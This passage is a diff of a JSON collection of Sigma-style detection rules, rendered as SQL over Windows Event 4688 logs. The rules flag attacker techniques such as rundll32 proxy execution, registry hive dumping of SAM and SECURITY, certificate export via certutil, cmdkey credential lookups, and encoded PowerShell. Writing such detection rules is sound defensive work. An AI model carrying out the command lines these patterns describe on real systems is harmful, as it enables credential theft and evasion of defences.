], - "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" + "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" }, { - "title": "PowerShell Base64 Encoded FromBase64String Keyword", - "id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "title": "New Process Created Via Wmic.EXE", + "id": "526be59f-a573-4eea-b5f7-f0973207634d", "status": "test", - "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects new process creation using WMIC via the \"process call create\" flag", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1140", "attack.execution", - "attack.t1059.001" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE 
'%OjpGcm9tQmFzZTY0U3RyaW5n%' ESCAPE '\\' OR CommandLine LIKE '%o6RnJvbUJhc2U2NFN0cmluZ%' ESCAPE '\\' OR CommandLine LIKE '%6OkZyb21CYXNlNjRTdHJpbm%' ESCAPE '\\' OR (CommandLine LIKE '%OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA%' ESCAPE '\\' OR CommandLine LIKE '%oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_frombase64string.yml" + "filename": "proc_creation_win_wmic_process_creation.yml" }, { - "title": "PUA - Mouse Lock Execution", - "id": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", - "status": "test", - "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", - "author": "Cian Heasley", + "title": "Potential RDP Session Hijacking Activity", + "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "status": "experimental", + "description": "Detects potential RDP Session Hijacking activity on Windows systems", + "author": "@juju4", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.execution" ], "falsepositives": [ - "Legitimate uses of Mouse Lock software" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\' OR 
OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" ], - "filename": "proc_creation_win_pua_mouselock_execution.yml" + "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Rundll32 Activity", + "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND 
CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' 
ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_rundll32_susp_activity.yml" }, { - "title": "WinDbg/CDB LOLBIN Usage", - "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "title": "Certificate Exported Via Certutil.EXE", + "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", "status": "test", - "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1218", - "attack.t1127" + "attack.t1027" ], "falsepositives": [ - "Legitimate use of debugging tools" + "There legitimate reasons to export certificates. 
Investigate the activity to determine if it's benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cdb.yml" + "filename": "proc_creation_win_certutil_export_pfx.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "Permission Check Via Accesschk.EXE", + "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "status": "test", + "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "falsepositives": [ + "System administrator Usage" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + ], + "filename": 
"proc_creation_win_sysinternals_accesschk_check_permissions.yml" + }, + { + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' 
OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Suspicious Git Clone", + "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", + "status": "experimental", + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.reconnaissance", + "attack.t1593.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\git.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' 
ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_git_susp_clone.yml" }, { - "title": "Abusing Findstr for Defense Evasion", - "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "title": "Verclsid.exe Runs COM Object", + "id": "d06be4b9-8045-428b-a567-740a26d9db25", "status": "test", - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" + "attack.t1218" ], "falsepositives": [ - "Administrative findstr usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR NewProcessName LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND 
Channel = 'Security') AND (NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_findstr.yml" + "filename": "proc_creation_win_verclsid_runs_com.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects the use of SDelete to erase a file not the free space", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.impact", + "attack.t1485" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", - "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", + "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "status": "experimental", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools 
that work with encoded scripts in the command line instead of script files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "DLL Loaded via CertOC.EXE", + "id": "242301bc-f92f-4476-8718-78004a6efd9f", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", - "author": "elhoim", + "description": "Detects 
when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_certoc_load_dll.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.t1003.005" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. 
backup or forensic investigation" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", - "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "status": "experimental", + "description": "Detects the suspicious execution 
of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", - "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR 
